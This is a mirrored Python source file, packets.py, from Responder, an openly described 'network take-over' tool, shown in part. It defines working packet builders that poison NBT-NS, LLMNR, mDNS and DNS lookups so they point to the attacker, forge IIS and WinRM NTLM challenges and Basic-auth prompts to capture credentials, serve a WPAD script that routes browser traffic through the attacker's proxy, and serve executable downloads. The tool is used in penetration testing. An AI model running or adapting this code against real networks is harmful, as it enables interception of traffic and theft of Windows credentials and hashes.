mirror of
https://github.com/lgandx/Responder.git
synced 2025-07-05 12:35:52 -07:00
2493 lines
148 KiB
Python
2493 lines
148 KiB
Python
#!/usr/bin/env python
|
|
# This file is part of Responder, a network take-over set of tools
|
|
# created and maintained by Laurent Gaffie.
|
|
# email: laurent.gaffie@gmail.com
|
|
# This program is free software: you can redistribute it and/or modify
|
|
# it under the terms of the GNU General Public License as published by
|
|
# the Free Software Foundation, either version 3 of the License, or
|
|
# (at your option) any later version.
|
|
#
|
|
# This program is distributed in the hope that it will be useful,
|
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
# GNU General Public License for more details.
|
|
#
|
|
# You should have received a copy of the GNU General Public License
|
|
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
|
|
|
import struct
|
|
import settings
|
|
import codecs
|
|
import random
|
|
import re
|
|
from os import urandom
|
|
from base64 import b64decode, b64encode
|
|
from odict import OrderedDict
|
|
from utils import HTTPCurrentDate, SMBTime, RespondWithIPAton, RespondWithIPPton, RespondWithIP, StructPython2or3, NetworkRecvBufferPython2or3, StructWithLenPython2or3
|
|
|
|
# Packet class handling all packet generation (see odict.py).
|
|
class Packet():
|
|
fields = OrderedDict([
|
|
("data", ""),
|
|
])
|
|
def __init__(self, **kw):
|
|
self.fields = OrderedDict(self.__class__.fields)
|
|
for k,v in kw.items():
|
|
if callable(v):
|
|
self.fields[k] = v(self.fields[k])
|
|
else:
|
|
self.fields[k] = v
|
|
def __str__(self):
|
|
return "".join(map(str, self.fields.values()))
|
|
|
|
# NBT Answer Packet
|
|
class NBT_Ans(Packet):
|
|
fields = OrderedDict([
|
|
("Tid", ""),
|
|
("Flags", "\x85\x00"),
|
|
("Question", "\x00\x00"),
|
|
("AnswerRRS", "\x00\x01"),
|
|
("AuthorityRRS", "\x00\x00"),
|
|
("AdditionalRRS", "\x00\x00"),
|
|
("NbtName", ""),
|
|
("Type", "\x00\x20"),
|
|
("Classy", "\x00\x01"),
|
|
("TTL", "\x00\x04\x93\xe0"), #TTL: 3 days, 11 hours, 20 minutes (Default windows behavior)
|
|
("Len", "\x00\x06"),
|
|
("Flags1", "\x00\x00"),
|
|
("IP", "\x00\x00\x00\x00"),
|
|
])
|
|
|
|
def calculate(self,data):
|
|
self.fields["Tid"] = NetworkRecvBufferPython2or3(data[0:2])
|
|
self.fields["NbtName"] = NetworkRecvBufferPython2or3(data[12:46])
|
|
self.fields["IP"] = RespondWithIPAton()
|
|
|
|
# DNS Answer Packet
|
|
class DNS_Ans(Packet):
|
|
fields = OrderedDict([
|
|
("Tid", ""),
|
|
("Flags", "\x85\x10"),
|
|
("Question", "\x00\x01"),
|
|
("AnswerRRS", "\x00\x01"),
|
|
("AuthorityRRS", "\x00\x00"),
|
|
("AdditionalRRS", "\x00\x00"),
|
|
("QuestionName", ""),
|
|
("QuestionNameNull", "\x00"),
|
|
("Type", "\x00\x01"),
|
|
("Class", "\x00\x01"),
|
|
("AnswerPointer", "\xc0\x0c"),
|
|
("Type1", "\x00\x01"),
|
|
("Class1", "\x00\x01"),
|
|
("TTL", "\x00\x00\x00\x1e"), #30 secs, don't mess with their cache for too long..
|
|
("IPLen", "\x00\x04"),
|
|
("IP", "\x00\x00\x00\x00"),
|
|
])
|
|
|
|
def calculate(self,data):
|
|
self.fields["Tid"] = data[0:2]
|
|
self.fields["QuestionName"] = ''.join(data[12:].split('\x00')[:1])
|
|
self.fields["IP"] = RespondWithIPAton()
|
|
self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"])
|
|
|
|
# DNS Answer Packet OPT
|
|
class DNS_AnsOPT(Packet):
|
|
fields = OrderedDict([
|
|
("Tid", ""),
|
|
("Flags", "\x85\x10"),
|
|
("Question", "\x00\x01"),
|
|
("AnswerRRS", "\x00\x01"),
|
|
("AuthorityRRS", "\x00\x00"),
|
|
("AdditionalRRS", "\x00\x01"),
|
|
("QuestionName", ""),
|
|
("QuestionNameNull", "\x00"),
|
|
("Type", "\x00\x01"),
|
|
("Class", "\x00\x01"),
|
|
("AnswerPointer", "\xc0\x0c"),
|
|
("Type1", "\x00\x01"),
|
|
("Class1", "\x00\x01"),
|
|
("TTL", "\x00\x00\x00\x1e"), #30 secs, don't mess with their cache for too long..
|
|
("IPLen", "\x00\x04"),
|
|
("IP", "\x00\x00\x00\x00"),
|
|
("OPTName", "\x00"),
|
|
("OPTType", "\x00\x29"),
|
|
("OPTUDPSize", "\x10\x00"),
|
|
("OPTRCode", "\x00"),
|
|
("OPTEDNSVersion", "\x00"),
|
|
("OPTLen", "\x00\x00"),# Hardcoded since it's fixed to 0 in this case.
|
|
("OPTStr", "\x00\x00"),
|
|
])
|
|
|
|
def calculate(self,data):
|
|
self.fields["Tid"] = data[0:2]
|
|
self.fields["QuestionName"] = ''.join(data[12:].split('\x00')[:1])
|
|
self.fields["IP"] = RespondWithIPAton()
|
|
self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"])
|
|
|
|
class DNS6_Ans(Packet):
|
|
fields = OrderedDict([
|
|
("Tid", ""),
|
|
("Flags", "\x85\x10"),
|
|
("Question", "\x00\x01"),
|
|
("AnswerRRS", "\x00\x01"),
|
|
("AuthorityRRS", "\x00\x00"),
|
|
("AdditionalRRS", "\x00\x00"),
|
|
("QuestionName", ""),
|
|
("QuestionNameNull", "\x00"),
|
|
("Type", "\x00\x1c"),
|
|
("Class", "\x00\x01"),
|
|
("AnswerPointer", "\xc0\x0c"),
|
|
("Type1", "\x00\x1c"),
|
|
("Class1", "\x00\x01"),
|
|
("TTL", "\x00\x00\x00\x1e"), #30 secs, don't mess with their cache for too long..
|
|
("IPLen", "\x00\x04"),
|
|
("IP", "\x00\x00\x00\x00"),
|
|
])
|
|
|
|
def calculate(self,data):
|
|
self.fields["Tid"] = data[0:2]
|
|
self.fields["QuestionName"] = ''.join(data[12:].split('\x00')[:1])
|
|
self.fields["IP"] = RespondWithIPPton()
|
|
self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"])
|
|
|
|
class DNS6_AnsOPT(Packet):
|
|
fields = OrderedDict([
|
|
("Tid", ""),
|
|
("Flags", "\x85\x10"),
|
|
("Question", "\x00\x01"),
|
|
("AnswerRRS", "\x00\x01"),
|
|
("AuthorityRRS", "\x00\x00"),
|
|
("AdditionalRRS", "\x00\x01"),
|
|
("QuestionName", ""),
|
|
("QuestionNameNull", "\x00"),
|
|
("Type", "\x00\x1c"),
|
|
("Class", "\x00\x01"),
|
|
("AnswerPointer", "\xc0\x0c"),
|
|
("Type1", "\x00\x1c"),
|
|
("Class1", "\x00\x01"),
|
|
("TTL", "\x00\x00\x00\x1e"), #30 secs, don't mess with their cache for too long..
|
|
("IPLen", "\x00\x04"),
|
|
("IP", "\x00\x00\x00\x00"),
|
|
("OPTName", "\x00"),
|
|
("OPTType", "\x00\x29"),
|
|
("OPTUDPSize", "\x10\x00"),
|
|
("OPTRCode", "\x00"),
|
|
("OPTEDNSVersion", "\x00"),
|
|
("OPTLen", "\x00\x00"),# Hardcoded since it's fixed to 0 in this case.
|
|
("OPTStr", "\x00\x00"),
|
|
])
|
|
|
|
def calculate(self,data):
|
|
self.fields["Tid"] = data[0:2]
|
|
self.fields["QuestionName"] = ''.join(data[12:].split('\x00')[:1])
|
|
self.fields["IP"] = RespondWithIPPton()
|
|
self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"])
|
|
|
|
class DNS_SRV_Ans(Packet):
|
|
fields = OrderedDict([
|
|
("Tid", ""),
|
|
("Flags", "\x85\x80"),
|
|
("Question", "\x00\x01"),
|
|
("AnswerRRS", "\x00\x01"),
|
|
("AuthorityRRS", "\x00\x00"),
|
|
("AdditionalRRS", "\x00\x00"),
|
|
("QuestionName", ""),
|
|
("QuestionNameNull", "\x00"),
|
|
("Type", "\x00\x21"),#srv
|
|
("Class", "\x00\x01"),
|
|
("AnswerPointer", "\xc0\x0c"),
|
|
("Type1", "\x00\x21"),#srv
|
|
("Class1", "\x00\x01"),
|
|
("TTL", "\x00\x00\x00\x1e"), #30 secs, don't mess with their cache for too long..
|
|
("RecordLen", ""),
|
|
("Priority", "\x00\x00"),
|
|
("Weight", "\x00\x64"),
|
|
("Port", "\x00\x00"),
|
|
("TargetLenPre", "\x0f"), # static, we provide netbios computer name 15 chars like Windows by default.
|
|
("TargetPrefix", ""),
|
|
("TargetLenSuff", ""),
|
|
("TargetSuffix", ""),
|
|
("TargetLenSuff2", ""),
|
|
("TargetSuffix2", ""),
|
|
("TargetNull", "\x00"),
|
|
])
|
|
|
|
def calculate(self,data):
|
|
self.fields["Tid"] = data[0:2]
|
|
DNSName = ''.join(data[12:].split('\x00')[:1])
|
|
SplitFQDN = re.split(r'\W+', DNSName) # split the ldap.tcp.blah.blah.blah.domain.tld
|
|
|
|
#What's the question? we need it first to calc all other len.
|
|
self.fields["QuestionName"] = DNSName
|
|
|
|
#Want to be detected that easily by xyz sensor?
|
|
self.fields["TargetPrefix"] = settings.Config.MachineName
|
|
|
|
#two last parts of the domain are the actual Domain name.. eg: contoso.com
|
|
self.fields["TargetSuffix"] = SplitFQDN[-2]
|
|
self.fields["TargetSuffix2"] = SplitFQDN[-1]
|
|
#We calculate the len for that domain...
|
|
self.fields["TargetLenSuff2"] = StructPython2or3(">B",self.fields["TargetSuffix2"])
|
|
self.fields["TargetLenSuff"] = StructPython2or3(">B",self.fields["TargetSuffix"])
|
|
|
|
# Calculate Record len.
|
|
CalcLen = self.fields["Priority"]+self.fields["Weight"]+self.fields["Port"]+self.fields["TargetLenPre"]+self.fields["TargetPrefix"]+self.fields["TargetLenSuff"]+self.fields["TargetSuffix"]+self.fields["TargetLenSuff2"]+self.fields["TargetSuffix2"]+self.fields["TargetNull"]
|
|
|
|
#Our answer len..
|
|
self.fields["RecordLen"] = StructPython2or3(">h",CalcLen)
|
|
|
|
#for now we support ldap and kerberos...
|
|
if "ldap" in DNSName:
|
|
self.fields["Port"] = StructWithLenPython2or3(">h", 389)
|
|
|
|
if "kerberos" in DNSName:
|
|
self.fields["Port"] = StructWithLenPython2or3(">h", 88)
|
|
|
|
|
|
# LLMNR Answer Packet
|
|
class LLMNR_Ans(Packet):
|
|
fields = OrderedDict([
|
|
("Tid", ""),
|
|
("Flags", "\x80\x00"),
|
|
("Question", "\x00\x01"),
|
|
("AnswerRRS", "\x00\x01"),
|
|
("AuthorityRRS", "\x00\x00"),
|
|
("AdditionalRRS", "\x00\x00"),
|
|
("QuestionNameLen", "\x09"),
|
|
("QuestionName", ""),
|
|
("QuestionNameNull", "\x00"),
|
|
("Type", "\x00\x01"),
|
|
("Class", "\x00\x01"),
|
|
("AnswerNameLen", "\x09"),
|
|
("AnswerName", ""),
|
|
("AnswerNameNull", "\x00"),
|
|
("Type1", "\x00\x01"),
|
|
("Class1", "\x00\x01"),
|
|
("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec (Default windows behavior)
|
|
("IPLen", "\x00\x04"),
|
|
("IP", "\x00\x00\x00\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
self.fields["IP"] = RespondWithIPAton()
|
|
self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"])
|
|
self.fields["AnswerNameLen"] = StructPython2or3(">B",self.fields["AnswerName"])
|
|
self.fields["QuestionNameLen"] = StructPython2or3(">B",self.fields["QuestionName"])
|
|
|
|
class LLMNR6_Ans(Packet):
|
|
fields = OrderedDict([
|
|
("Tid", ""),
|
|
("Flags", "\x80\x00"),
|
|
("Question", "\x00\x01"),
|
|
("AnswerRRS", "\x00\x01"),
|
|
("AuthorityRRS", "\x00\x00"),
|
|
("AdditionalRRS", "\x00\x00"),
|
|
("QuestionNameLen", "\x09"),
|
|
("QuestionName", ""),
|
|
("QuestionNameNull", "\x00"),
|
|
("Type", "\x00\x1c"),
|
|
("Class", "\x00\x01"),
|
|
("AnswerNameLen", "\x09"),
|
|
("AnswerName", ""),
|
|
("AnswerNameNull", "\x00"),
|
|
("Type1", "\x00\x1c"),
|
|
("Class1", "\x00\x01"),
|
|
("TTL", "\x00\x00\x00\x1e"),##Poison for 30 sec (Default windows behavior).
|
|
("IPLen", "\x00\x04"),
|
|
("IP", "\x00\x00\x00\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
self.fields["IP"] = RespondWithIPPton()
|
|
self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"])
|
|
self.fields["AnswerNameLen"] = StructPython2or3(">B",self.fields["AnswerName"])
|
|
self.fields["QuestionNameLen"] = StructPython2or3(">B",self.fields["QuestionName"])
|
|
|
|
# MDNS Answer Packet
|
|
class MDNS_Ans(Packet):
|
|
fields = OrderedDict([
|
|
("Tid", "\x00\x00"),
|
|
("Flags", "\x84\x00"),
|
|
("Question", "\x00\x00"),
|
|
("AnswerRRS", "\x00\x01"),
|
|
("AuthorityRRS", "\x00\x00"),
|
|
("AdditionalRRS", "\x00\x00"),
|
|
("AnswerName", ""),
|
|
("AnswerNameNull", "\x00"),
|
|
("Type", "\x00\x01"),
|
|
("Class", "\x00\x01"),
|
|
("TTL", "\x00\x00\x00\x78"),##Poison for 2mn (Default windows behavior)
|
|
("IPLen", "\x00\x04"),
|
|
("IP", "\x00\x00\x00\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
self.fields["IP"] = RespondWithIPAton()
|
|
self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"])
|
|
|
|
# MDNS6 Answer Packet
|
|
class MDNS6_Ans(Packet):
|
|
fields = OrderedDict([
|
|
("Tid", "\x00\x00"),
|
|
("Flags", "\x84\x00"),
|
|
("Question", "\x00\x00"),
|
|
("AnswerRRS", "\x00\x01"),
|
|
("AuthorityRRS", "\x00\x00"),
|
|
("AdditionalRRS", "\x00\x00"),
|
|
("AnswerName", ""),
|
|
("AnswerNameNull", "\x00"),
|
|
("Type", "\x00\x1c"),
|
|
("Class", "\x00\x01"),
|
|
("TTL", "\x00\x00\x00\x78"),##Poison for 2mn (Default windows behavior)
|
|
("IPLen", "\x00\x04"),
|
|
("IP", "\x00\x00\x00\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
self.fields["IP"] = RespondWithIPPton()
|
|
self.fields["IPLen"] = StructPython2or3(">h",self.fields["IP"])
|
|
|
|
################### DHCP SRV ######################
|
|
|
|
|
|
##### HTTP Packets #####
|
|
class NTLM_Challenge(Packet):
|
|
fields = OrderedDict([
|
|
("Signature", "NTLMSSP"),
|
|
("SignatureNull", "\x00"),
|
|
("MessageType", "\x02\x00\x00\x00"),
|
|
("TargetNameLen", "\x06\x00"),
|
|
("TargetNameMaxLen", "\x06\x00"),
|
|
("TargetNameOffset", "\x38\x00\x00\x00"),
|
|
("NegoFlags", "\x05\x02\x81\xa2" if settings.Config.NOESS_On_Off else "\x05\x02\x89\xa2"),
|
|
("ServerChallenge", ""),
|
|
("Reserved", "\x00\x00\x00\x00\x00\x00\x00\x00"),
|
|
("TargetInfoLen", "\x7e\x00"),
|
|
("TargetInfoMaxLen", "\x7e\x00"),
|
|
("TargetInfoOffset", "\x3e\x00\x00\x00"),
|
|
("NTLMOsVersion", "\x0a\x00\x7c\x4f\x00\x00\x00\x0f"),
|
|
("TargetNameStr", settings.Config.Domain),
|
|
("Av1", "\x02\x00"),#nbt name
|
|
("Av1Len", "\x06\x00"),
|
|
("Av1Str", settings.Config.Domain),
|
|
("Av2", "\x01\x00"),#Server name
|
|
("Av2Len", "\x14\x00"),
|
|
("Av2Str", settings.Config.MachineName),
|
|
("Av3", "\x04\x00"),#Full Domain name
|
|
("Av3Len", "\x12\x00"),
|
|
("Av3Str", settings.Config.DomainName),
|
|
("Av4", "\x03\x00"),#Full machine domain name
|
|
("Av4Len", "\x28\x00"),
|
|
("Av4Str", settings.Config.MachineName+'.'+settings.Config.DomainName),
|
|
("Av5", "\x05\x00"),#Domain Forest Name
|
|
("Av5Len", "\x12\x00"),
|
|
("Av5Str", settings.Config.DomainName),
|
|
("Av6", "\x00\x00"),#AvPairs Terminator
|
|
("Av6Len", "\x00\x00"),
|
|
])
|
|
|
|
def calculate(self):
|
|
# First convert to unicode
|
|
self.fields["TargetNameStr"] = self.fields["TargetNameStr"].encode('utf-16le')
|
|
self.fields["Av1Str"] = self.fields["Av1Str"].encode('utf-16le')
|
|
self.fields["Av2Str"] = self.fields["Av2Str"].encode('utf-16le')
|
|
self.fields["Av3Str"] = self.fields["Av3Str"].encode('utf-16le')
|
|
self.fields["Av4Str"] = self.fields["Av4Str"].encode('utf-16le')
|
|
self.fields["Av5Str"] = self.fields["Av5Str"].encode('utf-16le')
|
|
#Now from bytes to str..
|
|
self.fields["TargetNameStr"] = self.fields["TargetNameStr"].decode('latin-1')
|
|
self.fields["Av1Str"] = self.fields["Av1Str"].decode('latin-1')
|
|
self.fields["Av2Str"] = self.fields["Av2Str"].decode('latin-1')
|
|
self.fields["Av3Str"] = self.fields["Av3Str"].decode('latin-1')
|
|
self.fields["Av4Str"] = self.fields["Av4Str"].decode('latin-1')
|
|
self.fields["Av5Str"] = self.fields["Av5Str"].decode('latin-1')
|
|
# Then calculate
|
|
|
|
CalculateNameOffset = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str("A"*8)+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])
|
|
|
|
CalculateAvPairsOffset = CalculateNameOffset+str(self.fields["TargetNameStr"])
|
|
CalculateAvPairsLen = str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"])
|
|
|
|
# Target Name Offsets
|
|
self.fields["TargetNameOffset"] = StructPython2or3("<i",CalculateNameOffset)
|
|
self.fields["TargetNameLen"] = StructPython2or3("<h",self.fields["TargetNameStr"])
|
|
self.fields["TargetNameMaxLen"] = StructPython2or3("<h",self.fields["TargetNameStr"])
|
|
# AvPairs Offsets
|
|
self.fields["TargetInfoOffset"] = StructPython2or3("<i",CalculateAvPairsOffset)
|
|
self.fields["TargetInfoLen"] = StructPython2or3("<h",CalculateAvPairsLen)
|
|
self.fields["TargetInfoMaxLen"] = StructPython2or3("<h",CalculateAvPairsLen)
|
|
# AvPairs StrLen
|
|
self.fields["Av1Len"] = StructPython2or3("<h",self.fields["Av1Str"])
|
|
self.fields["Av2Len"] = StructPython2or3("<h",self.fields["Av2Str"])
|
|
self.fields["Av3Len"] = StructPython2or3("<h",self.fields["Av3Str"])
|
|
self.fields["Av4Len"] = StructPython2or3("<h",self.fields["Av4Str"])
|
|
self.fields["Av5Len"] = StructPython2or3("<h",self.fields["Av5Str"])
|
|
|
|
class IIS_Auth_401_Ans(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
|
|
("Type", "Content-Type: text/html\r\n"),
|
|
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
|
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
|
("WWW-Auth", "WWW-Authenticate: Negotiate\r\n"),
|
|
("WWW-Auth2", "WWW-Authenticate: NTLM\r\n"),
|
|
("Len", "Content-Length: "),
|
|
("ActualLen", "76"),
|
|
("CRLF", "\r\n\r\n"),
|
|
("Payload", """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
|
|
<html xmlns="http://www.w3.org/1999/xhtml">
|
|
<head>
|
|
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
|
|
<title>401 - Unauthorized: Access is denied due to invalid credentials.</title>
|
|
<style type="text/css">
|
|
<!--
|
|
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
|
|
fieldset{padding:0 15px 10px 15px;}
|
|
h1{font-size:2.4em;margin:0;color:#FFF;}
|
|
h2{font-size:1.7em;margin:0;color:#CC0000;}
|
|
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
|
|
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
|
|
background-color:#555555;}
|
|
#content{margin:0 0 0 2%;position:relative;}
|
|
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
|
|
-->
|
|
</style>
|
|
</head>
|
|
<body>
|
|
<div id="header"><h1>Server Error</h1></div>
|
|
<div id="content">
|
|
<div class="content-container"><fieldset>
|
|
<h2>401 - Unauthorized: Access is denied due to invalid credentials.</h2>
|
|
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
|
|
</fieldset></div>
|
|
</div>
|
|
</body>
|
|
</html>
|
|
"""),
|
|
])
|
|
def calculate(self):
|
|
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
|
|
|
|
class IIS_Auth_Granted(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "HTTP/1.1 200 OK\r\n"),
|
|
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
|
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
|
("Type", "Content-Type: text/html\r\n"),
|
|
("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
|
|
("ContentLen", "Content-Length: "),
|
|
("ActualLen", "76"),
|
|
("CRLF", "\r\n\r\n"),
|
|
("Payload", ""),
|
|
])
|
|
def calculate(self):
|
|
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
|
|
|
|
class IIS_NTLM_Challenge_Ans(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
|
|
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
|
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
|
("Type", "Content-Type: text/html\r\n"),
|
|
("WWWAuth", "WWW-Authenticate: NTLM "),
|
|
("Payload", ""),
|
|
("Payload-CRLF", "\r\n"),
|
|
("ContentLen", "Content-Length: "),
|
|
("ActualLen", "76"),
|
|
("CRLF", "\r\n\r\n"),
|
|
("Payload2", """<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
|
|
<HTML><HEAD><TITLE>Not Authorized</TITLE>
|
|
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
|
|
<BODY><h2>Not Authorized</h2>
|
|
<hr><p>HTTP Error 401. The requested resource requires user authentication.</p>
|
|
</BODY></HTML>
|
|
"""),
|
|
])
|
|
def calculate(self):
|
|
self.fields["ActualLen"] = len(str(self.fields["Payload2"]))
|
|
|
|
class WinRM_NTLM_Challenge_Ans(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "HTTP/1.1 401\r\n"),
|
|
("WWWAuth", "WWW-Authenticate: Negotiate "),
|
|
("Payload", ""),
|
|
("Payload-CRLF", "\r\n"),
|
|
("ServerType", "Server: Microsoft-HTTPAPI/2.0\r\n"),
|
|
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
|
("Len", "Content-Length: 0\r\n"),
|
|
("CRLF", "\r\n"),
|
|
])
|
|
|
|
def calculate(self,payload):
|
|
self.fields["Payload"] = b64encode(payload)
|
|
|
|
class IIS_Basic_401_Ans(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
|
|
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
|
("Type", "Content-Type: text/html\r\n"),
|
|
("WWW-Auth", "WWW-Authenticate: Basic realm=\"Authentication Required\"\r\n"),
|
|
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
|
("Len", "Content-Length: "),
|
|
("ActualLen", "76"),
|
|
("CRLF", "\r\n\r\n"),
|
|
("Payload", """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
|
|
<html xmlns="http://www.w3.org/1999/xhtml">
|
|
<head>
|
|
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
|
|
<title>401 - Unauthorized: Access is denied due to invalid credentials.</title>
|
|
<style type="text/css">
|
|
<!--
|
|
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
|
|
fieldset{padding:0 15px 10px 15px;}
|
|
h1{font-size:2.4em;margin:0;color:#FFF;}
|
|
h2{font-size:1.7em;margin:0;color:#CC0000;}
|
|
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
|
|
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
|
|
background-color:#555555;}
|
|
#content{margin:0 0 0 2%;position:relative;}
|
|
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
|
|
-->
|
|
</style>
|
|
</head>
|
|
<body>
|
|
<div id="header"><h1>Server Error</h1></div>
|
|
<div id="content">
|
|
<div class="content-container"><fieldset>
|
|
<h2>401 - Unauthorized: Access is denied due to invalid credentials.</h2>
|
|
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
|
|
</fieldset></div>
|
|
</div>
|
|
</body>
|
|
</html>
|
|
"""),
|
|
])
|
|
def calculate(self):
|
|
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
|
|
|
|
##### Proxy mode Packets #####
|
|
class WPADScript(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "HTTP/1.1 200 OK\r\n"),
|
|
("Type", "Content-Type: application/x-ns-proxy-autoconfig\r\n"),
|
|
("Cache", "Pragma: no-cache\r\n"),
|
|
("Server", "Server: BigIP\r\n"),
|
|
("ContentLen", "Content-Length: "),
|
|
("ActualLen", "76"),
|
|
("CRLF", "\r\n\r\n"),
|
|
("Payload", "function FindProxyForURL(url, host){return 'PROXY "+RespondWithIP()+":3141; DIRECT';}"),
|
|
])
|
|
def calculate(self):
|
|
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
|
|
|
|
class ServeExeFile(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "HTTP/1.1 200 OK\r\n"),
|
|
("ContentType", "Content-Type: application/octet-stream\r\n"),
|
|
("LastModified", "Last-Modified: "+HTTPCurrentDate()+"\r\n"),
|
|
("AcceptRanges", "Accept-Ranges: bytes\r\n"),
|
|
("Server", "Server: Microsoft-IIS/10.0\r\n"),
|
|
("ContentDisp", "Content-Disposition: attachment; filename="),
|
|
("ContentDiFile", ""),
|
|
("FileCRLF", ";\r\n"),
|
|
("ContentLen", "Content-Length: "),
|
|
("ActualLen", "76"),
|
|
("Date", "\r\nDate: "+HTTPCurrentDate()+"\r\n"),
|
|
("Connection", "Connection: keep-alive\r\n"),
|
|
("X-CCC", "US\r\n"),
|
|
("X-CID", "2\r\n"),
|
|
("CRLF", "\r\n"),
|
|
("Payload", "jj"),
|
|
])
|
|
def calculate(self):
|
|
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
|
|
|
|
class ServeHtmlFile(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "HTTP/1.1 200 OK\r\n"),
|
|
("ContentType", "Content-Type: text/html\r\n"),
|
|
("LastModified", "Last-Modified: "+HTTPCurrentDate()+"\r\n"),
|
|
("AcceptRanges", "Accept-Ranges: bytes\r\n"),
|
|
("Server", "Server: Microsoft-IIS/10.0\r\n"),
|
|
("ContentLen", "Content-Length: "),
|
|
("ActualLen", "76"),
|
|
("Date", "\r\nDate: "+HTTPCurrentDate()+"\r\n"),
|
|
("Connection", "Connection: keep-alive\r\n"),
|
|
("CRLF", "\r\n"),
|
|
("Payload", "jj"),
|
|
])
|
|
def calculate(self):
|
|
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
|
|
|
|
##### WPAD Auth Packets #####
|
|
class WPAD_Auth_407_Ans(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "HTTP/1.1 407 Unauthorized\r\n"),
|
|
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
|
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
|
("Type", "Content-Type: text/html\r\n"),
|
|
("WWW-Auth", "Proxy-Authenticate: NTLM\r\n"),
|
|
("Connection", "Proxy-Connection: close\r\n"),
|
|
("Cache-Control", "Cache-Control: no-cache\r\n"),
|
|
("Pragma", "Pragma: no-cache\r\n"),
|
|
("Proxy-Support", "Proxy-Support: Session-Based-Authentication\r\n"),
|
|
("Len", "Content-Length: 0\r\n"),
|
|
("CRLF", "\r\n"),
|
|
])
|
|
|
|
|
|
class WPAD_NTLM_Challenge_Ans(Packet):
|
|
fields = OrderedDict([
|
|
("Code", "HTTP/1.1 407 Unauthorized\r\n"),
|
|
("ServerType", "Server: Microsoft-IIS/10.0\r\n"),
|
|
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
|
|
("Type", "Content-Type: text/html\r\n"),
|
|
("WWWAuth", "Proxy-Authenticate: NTLM "),
|
|
("Payload", ""),
|
|
("Payload-CRLF", "\r\n"),
|
|
("Len", "Content-Length: 0\r\n"),
|
|
